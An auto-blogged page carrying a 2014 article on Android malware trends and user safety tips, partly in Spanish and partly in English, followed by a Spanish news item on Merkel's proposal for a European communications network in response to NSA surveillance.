• Las organizaciones deben llevar a cabo una política de prevención de malware, que debe abordar la sensibilización del personal de TI, la mitigación de la vulnerabilidad y la arquitectura defensiva. Tal política debe ser flexible en cuanto a la actualización y la comprensión.

Por último, el malware móvil necesita una atención especial para evitar nuevos ataques cibernéticos. Los hackers han sofisticado sus tácticas de malware móvil para que los usuarios inocentes sean víctima del cibercrimen. Le invitamos a compartir sus pensamientos al respecto.

English version:

Android is already a popular platform for Smartphone. But it also carries vulnerability along with it. A well-known Juniper report in 2013 showed that Android is the mainly infected OS that contains 92% vulnerable apps. Security experts are showing concern about emerging threats against Android and Smartphone. Due to increase in Smartphone usage, many users changed their web surfing habit by replacing desktop with Smartphone for their daily tasks. Whether they are doing online shopping, online banking or visiting social media, their first preference would be Smartphone rather than laptop or desktop.

If we talk about 2014 Smartphone security report, then Cisco 2014 security report states that mobile malware is worth considering a topic in upcoming months of 2014. However, in 2013, mobile malware share was at only 1.2%, but in future, hackers would target Smartphone devices in a great amount due to changing trend of users and easy access. Cisco said that some of mobile malwares were designed to trace Smartphone devices, but there are other malwares designed for phishing, likejacking, and other social engineering.

Android users contribute 71%, facing all types of web delivered malware, while Apple iPhone users contribute 14% facing with 14% of all web malware encounters.

Cisco report also showed that there is an android malware named “Andr/Qdplugin-A” was most encountered mobile malware (43%) in 2013.
Another important Sophos 2014 security report listed out some most happening android malware during 2013, which are as follows.
 

From the above listed android malwares, there are still three major android malwares that spread havoc in 2013, which are as follows. 

Botnet named “Andr/GGSmart-A”: This Botnet works on PC and mobile in the same pattern like using centralized command and control of a mobile device. It can send a chargeable premium SMS to the device owner. This Botnet can change the text of SMS, control premium SMS numbers.

Ransomware: In June 2013, the first ransomware was discovered against Android device named Android Defender. This ransomware uses different social engineering tactics and makes files and device inaccessible and demands payment to release your device or files. Generally, ransomware gets access administrator privileges. It can restrict outgoing calls, change settings, kill tasks, and uninstall the apps. Even ransomware can remove back and home button of the browser.

Andr/Spy-ABN: It is a new form of malware, which targets banking website by making a combination of man-in-browser attack and social engineering tactics to steal user data from Smartphone.

Some security precautions from the user and organization’s perspective:

•    Never respond to unknown ads link as it may contain malware that may install malicious software or may lead you to the websites.
•    Always refuse apps that require access permission like contacts and other personal stuffs during the installation.
•    Always prefer Google Play for App download and avoid a third party download sources as it may contain malicious apps.
•    Always consider user’s reviews before downloading any apps.
•    Use trusted antivirus program in your Smartphone that regularly scans your entire Smartphone.
•    Keeps your device updated. Always consider an update from device manufacturers.
•    Access your device only in a secured wireless access, avoid free wifi.
•    Organizations should choose malware incident prevention according to environment like managed and non-managed environment.
•    Organizations’ IT staff should provide knowledge to its users and employees to bring awareness among them about vulnerability and risk mitigation.
•    Organizations should carry out malware prevention policy, which must address IT staff awareness, vulnerability mitigation, ndefensive architecture. Such policy should be flexible in terms of update and understanding.

Finally, mobile malware needs individual attention to avert further cyber attacks. Hackers have become sophisticated and use mobile malware tactics to make the innocent users victim of cyber crime. You are welcome to share your thoughts on same niche.

About Author: Abel Wike is a head of fraud prevention team at ClickSSL.com She enjoys the challenges of creativity and attention to detail. Advance Technology has always a source of wonder for her, sparking her research, to extend her sympathetic and knowledge of this earliest progress. In so doing she has focused with a deeper insight into various technologies. Follow her on Facebook, Twitter & LinkedIn

View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.

martes, 18 de febrero de 2014

Merkel propone una red europea contra el espionaje de los EE.UU. y Gran Bretaña

La canciller alemana, Angela Merkel, propone la creación de una red de comunicaciones europea para ayudar a mejorar la protección de datos.
El principal objetivo sería evitar que los correos electrónicos y otros datos atravesaran las redes de comunicaciones de los Estados Unidos.

Varios documentos clasificados de la NSA revelaron que se están recogiendo grandes cantidades de datos de carácter personal a través de Internet en pro de una vigilancia desmedida llevada a cabo por los EE.UU. y Gran Bretaña. Snowden filtró que incluso los teléfonos móviles de los aliados de Estados Unidos, como Merkel, habían sido controlados por la Inteligencia Estadounidense. 

Y todo esto no ha hecho más que acrecentar ha impulsado gran preocupación en Europa.

Merkel dijo que Europa tenía que hacer más en el ámbito de la protección de datos y criticó también el hecho de que Facebook y Google utilizan las leyes de países con bajos niveles de protección de datos mientras que realizan negocios en países que ofrecen garantías más rigurosas.

"Sobre todo, vamos a hablar acerca de proveedores europeos que ofrecen seguridad para nuestros ciudadanos, por lo que uno no debería tener que enviar mensajes de correo electrónico u otra información a través del Atlántico", dijo.

"De hecho, se podría construir una red de comunicación dentro de Europa".

La vigilancia exhaustiva ya se realizó bajo los nazis y en la Alemania Oriental comunista, así que la privacidad personal es un tema muy sensible en  Alemania.

Un portavoz de la política exterior de los demócratas cristianos de Merkel, Philipp Missfelder, dijo recientemente que las revelaciones sobre el espionaje EE.UU. habían empujado a llevar las relaciones con Washington a su peor nivel desde la invasión liderada por Estados Unidos a Irak en 2003.

Un funcionario francés, citado por la agencia de noticias Reuters, ya ha adelantado que el gobierno de París planea tomar la iniciativa alemana.

Fuente: Data protection: Angela Merkel proposes Europe network


View the original article here


This post was made using the Auto Blogging Software from WebMagnates.org This line will not appear when posts are made after activating the software to full version.